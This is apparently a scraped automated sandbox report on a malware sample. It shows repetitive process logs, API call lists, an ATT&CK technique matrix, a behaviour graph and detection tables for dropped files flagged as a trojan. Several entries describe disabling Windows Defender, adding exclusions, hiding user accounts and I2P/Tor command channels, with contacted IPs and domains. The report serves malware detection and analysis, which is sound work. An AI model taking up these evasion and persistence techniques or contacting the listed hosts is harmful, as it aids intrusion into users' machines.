Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA6FD5 GetSystemTimeAsFileTime,6_2_00007FF66EBA6FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5576DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,24_2_00007FFDA5576DA3
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: f8ff311483bvmdq2bvv.exe, 00000006.00000002.2162992393.00000239A82A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55758DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,24_2_00007FFDA55758DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55AAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,24_2_00007FFDA55AAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55D1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,24_2_00007FFDA55D1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5BA28BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,24_2_00007FFDA5BA28BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5BBB820 listen,htons,recv,select,24_2_00007FFDA5BBB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5BBB7E8 bind,24_2_00007FFDA5BBB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC0F418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,24_2_00007FFDAC0F418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC1215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,24_2_00007FFDAC1215FA
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
21
Disable or Modify Tools
1
Network Sniffing
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API
1
DLL Side-Loading
2
Valid Accounts
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
1
Create Account
2
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager1
System Service Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution
2
Valid Accounts
4
Windows Service
1
Timestomp
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd4
Windows Service
11
Process Injection
1
DLL Side-Loading
LSA Secrets1
Network Sniffing
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
File Deletion
Cached Domain Credentials24
System Information Discovery
VNCGUI Input Capture1
Proxy
Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading
DCSync1
Network Share Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts
Proc Filesystem131
Security Software Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Access Token Manipulation
/etc/passwd and /etc/shadow31
Virtualization/Sandbox Evasion
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
Virtualization/Sandbox Evasion
Network Sniffing2
Process Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection
Input Capture1
Application Window Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Hidden Users
Keylogging1
System Owner/User Discovery
Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Services File Permissions Weakness
GUI Input Capture1
System Network Configuration Discovery
Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532228 Sample: file.exe Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 87 reseed.stormycloud.org 2->87 89 reseed.memcpy.io 2->89 105 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->105 107 Contains functionality to hide user accounts 2->107 109 Connects to many ports of the same IP (likely port scanning) 2->109 111 7 other signatures 2->111 9 main.exe 2->9         started        14 file.exe 3 2->14         started        16 main.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 91 reseed.stormycloud.org 144.172.118.154 QUICKPACKETUS United States 9->91 93 217.25.231.221 IC-VORONEZH-ASInformsvyaz-ChernozemyeRU Russian Federation 9->93 101 15 other IPs or domains 9->101 73 C:\Windows\Temp\o1i2PUnI, PE32+ 9->73 dropped 75 C:\Windows\Temp\nVYOsq5a, PE32+ 9->75 dropped 77 C:\Windows\Temp\m28TQ56q, PE32+ 9->77 dropped 85 15 other files (13 malicious) 9->85 dropped 127 Multi AV Scanner detection for dropped file 9->127 129 Contains functionality to hide user accounts 9->129 131 Found Tor onion address 9->131 20 WerFault.exe 9->20         started        95 146.70.24.213, 1126, 49710 TENET-1ZA United Kingdom 14->95 79 C:\Users\user\...\f8ff311483bvmdq2bvv.exe, PE32+ 14->79 dropped 81 C:\Users\...\31yd7ynpdj6jw5vl4xn9qyj7u.exe, PE32+ 14->81 dropped 83 C:\Users\user\...\frdnii7m0pblld98fxhpnx.bat, DOS 14->83 dropped 23 31yd7ynpdj6jw5vl4xn9qyj7u.exe 10 14->23         started        26 cmd.exe 1 14->26         started        28 f8ff311483bvmdq2bvv.exe 3 14->28         started        97 186.128.148.177 TelefonicadeArgentinaAR Argentina 16->97 99 195.16.22.143 TELENET-ASBE Belgium 16->99 103 5 other IPs or domains 16->103 30 WerFault.exe 16->30         started        32 WerFault.exe 18->32         started        34 WerFault.exe 18->34         started        file6 signatures7 process8 file9 67 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->67 dropped 69 C:\Users\Public\...\main.exe, PE32+ 23->69 dropped 113 Multi AV Scanner detection for dropped file 23->113 115 Contains functionality to hide user accounts 23->115 117 Machine Learning detection for dropped file 23->117 119 Found Tor onion address 23->119 36 taskkill.exe 1 23->36         started        38 sc.exe 1 23->38         started        40 sc.exe 23->40         started        51 4 other processes 23->51 121 Modifies Windows Defender protection settings 26->121 123 Adds a directory exclusion to Windows Defender 26->123 42 powershell.exe 23 26->42         started        45 powershell.exe 23 26->45         started        47 powershell.exe 23 26->47         started        49 conhost.exe 26->49         started        71 C:\ProgramData\Microsoft\...\Report.wer, Unicode 30->71 dropped signatures10 process11 signatures12 53 conhost.exe 36->53         started        55 conhost.exe 38->55         started        57 conhost.exe 40->57         started        125 Loading BitLocker PowerShell Module 42->125 59 conhost.exe 51->59         started        61 conhost.exe 51->61         started        63 conhost.exe 51->63         started        65 conhost.exe 51->65         started        process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe67%ReversingLabsWin64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe42%ReversingLabsWin64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe3%ReversingLabs
C:\Windows\Temp\459WBsWA0%ReversingLabs
C:\Windows\Temp\CheAuE4k0%ReversingLabs
C:\Windows\Temp\LL369bff0%ReversingLabs
C:\Windows\Temp\OKh5fbg50%ReversingLabs
C:\Windows\Temp\SCKoP3sQ0%ReversingLabs
C:\Windows\Temp\ZNdEbgqy0%ReversingLabs
C:\Windows\Temp\m28TQ56q0%ReversingLabs
C:\Windows\Temp\nVYOsq5a0%ReversingLabs
C:\Windows\Temp\o1i2PUnI0%ReversingLabs
No Antivirus matches
SourceDetectionScannerLabelLink
reseed.memcpy.io2%VirustotalBrowse
reseed.stormycloud.org0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://i2pseed.creativecowpat.net:8443/1%VirustotalBrowse
https://reseed-fr.i2pd.xyz/3%VirustotalBrowse
https://reseed.i2p-projekt.de/4%VirustotalBrowse
https://reseed.memcpy.io/0%VirustotalBrowse
https://netdb.i2p2.no/0%VirustotalBrowse
https://reseed.memcpy.io/p/p_lib.c1%VirustotalBrowse
https://i2p.ghativega.in/0%VirustotalBrowse
https://i2p.novg.net/1%VirustotalBrowse
https://www2.mk16.de/0%VirustotalBrowse
https://reseed.i2pgit.org/2%VirustotalBrowse
https://reseed-pl.i2pd.xyz/0%VirustotalBrowse
https://reseed.onion.im/2%VirustotalBrowse
http://127.0.0.1:81180%VirustotalBrowse
https://reseed.diva.exchange/2%VirustotalBrowse
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%VirustotalBrowse
https://reseed.stormycloud.org/0%VirustotalBrowse
https://legit-website.com/i2pseeds.su30%VirustotalBrowse
https://reseed2.i2p.net/3%VirustotalBrowse
https://banana.incognet.io/2%VirustotalBrowse
https://i2p.mooo.com/netDb/2%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
reseed.memcpy.io
95.216.2.172
truetrueunknown
reseed.stormycloud.org
144.172.118.154
truetrueunknown
NameSourceMaliciousAntivirus DetectionReputation
https://reseed-fr.i2pd.xyz/main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmptrueunknown
https://reseed.diva.exchange/b.cmain.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
